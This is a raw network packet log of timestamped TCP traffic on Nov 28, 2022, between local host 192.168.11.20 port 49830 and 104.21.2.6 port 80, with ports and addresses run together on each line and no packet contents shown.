                                                                    Nov 28, 2022 16:37:03.833477974 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.833488941 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.833528996 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.833539963 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.833550930 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.833561897 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.833573103 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.833583117 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.833590031 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.833590031 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.833604097 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.833616018 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.833760977 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.833760977 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.833930016 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.834176064 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.834270000 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.834321976 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.834347010 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.834367037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.834388018 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.834408998 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.834429979 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.834443092 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.834443092 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.834470034 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.834494114 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.834517956 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.834541082 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.834561110 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.834582090 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.834610939 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.834610939 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.834660053 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.834706068 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.834779978 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.834949017 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.835108042 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.835119963 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.835233927 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.835256100 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.835289001 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.835341930 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.835400105 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.835418940 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.835439920 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.835454941 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.835465908 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.835495949 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.835508108 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.835519075 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.835530996 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.835546970 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.835556984 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.835556984 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.835566998 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.835577965 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.835589886 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.835601091 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.835727930 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.835728884 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.835896969 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.836113930 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.836230993 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.836286068 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.836299896 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.836321115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.836349010 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.836396933 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.836407900 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.836450100 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.836462021 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.836473942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.836484909 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.836529016 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.836559057 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.836570024 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.836595058 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.836674929 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.836844921 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.837094069 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.837208986 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.837220907 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.837245941 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.837287903 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.837311983 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.837332964 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.837357044 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.837378025 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.837399006 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.837419987 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.837440014 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.837461948 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.837482929 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.837503910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.837508917 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.837508917 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.837527037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.837538958 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.837677956 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.837677956 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.837846994 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.838006020 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.838138103 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.838187933 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.838284969 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.844175100 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.845835924 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.845920086 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.845942020 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.845964909 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.845994949 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846009970 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846020937 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846033096 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846044064 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846055984 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846067905 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846079111 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846091032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846101999 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846113920 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846126080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846137047 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846148968 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846194029 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.846363068 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.846385002 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846396923 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846409082 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846420050 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846431971 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846441031 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846452951 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846463919 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846476078 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846487045 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846498966 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846508980 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.846673012 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846688032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846698999 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846710920 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846723080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846735001 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846745968 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846757889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846769094 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846781015 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846791983 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846803904 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846815109 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846829891 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846847057 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846851110 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.846851110 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.846868038 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846884966 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846904039 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846924067 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.846946001 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847033024 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.847209930 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.847233057 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847347021 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.847501040 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847516060 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.847527981 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847539902 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847551107 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847562075 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847573042 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847584009 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847594023 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847610950 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847625971 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847636938 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847650051 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847668886 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847687960 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.847687960 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.847701073 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847718000 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847728968 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847740889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847753048 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847764969 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847881079 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.847938061 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847959042 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847979069 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.847999096 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848018885 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848077059 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.848228931 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848246098 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.848246098 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.848417044 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.848520994 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848537922 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848550081 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848560095 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848571062 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848582029 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848594904 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848606110 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848617077 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848628044 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848639011 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848649025 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848659992 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848670959 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848689079 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848707914 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848726988 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848740101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848751068 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848756075 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.848768950 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848779917 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848790884 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848802090 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848812103 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.848926067 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.849095106 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.849109888 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.849225998 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.849240065 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.849272013 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.849292040 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.849312067 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.849332094 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.849436998 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.849436998 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.849605083 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.853055954 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853188038 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853202105 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853215933 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853226900 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853238106 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853249073 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853260994 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853271961 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853282928 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853292942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853305101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853315115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853326082 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853337049 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853348017 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853358984 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853369951 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853379965 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853390932 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853456974 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.853456974 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.853619099 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.853648901 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853662014 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853672981 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853683949 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853694916 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853704929 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853717089 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853796005 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.853885889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853899002 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853909969 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853920937 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853931904 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853934050 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.853948116 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853959084 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853969097 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853980064 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.853991985 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.854002953 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.854012966 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.854023933 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.854033947 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.854044914 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.854055882 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.854065895 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.854077101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.854087114 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.854098082 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.854109049 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.854119062 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.854154110 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.854154110 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.854162931 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.854321957 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.854491949 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.856790066 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.856957912 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.857088089 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.857101917 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.857115984 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.857127905 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.857137918 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.857148886 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.857158899 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.857306957 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.857306957 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.863392115 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.864386082 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.864531994 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.864578009 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.864592075 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.864605904 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.864649057 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.864660025 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.864670992 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.864681959 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.864706993 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.864717960 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.864728928 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.864739895 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.864751101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.864762068 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.864764929 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.864778042 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.864789009 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.864799023 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.864809990 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.864814043 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.864825964 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.864836931 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.864999056 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.864999056 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.865026951 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.865040064 CET8049830104.21.2.6192.168.11.20
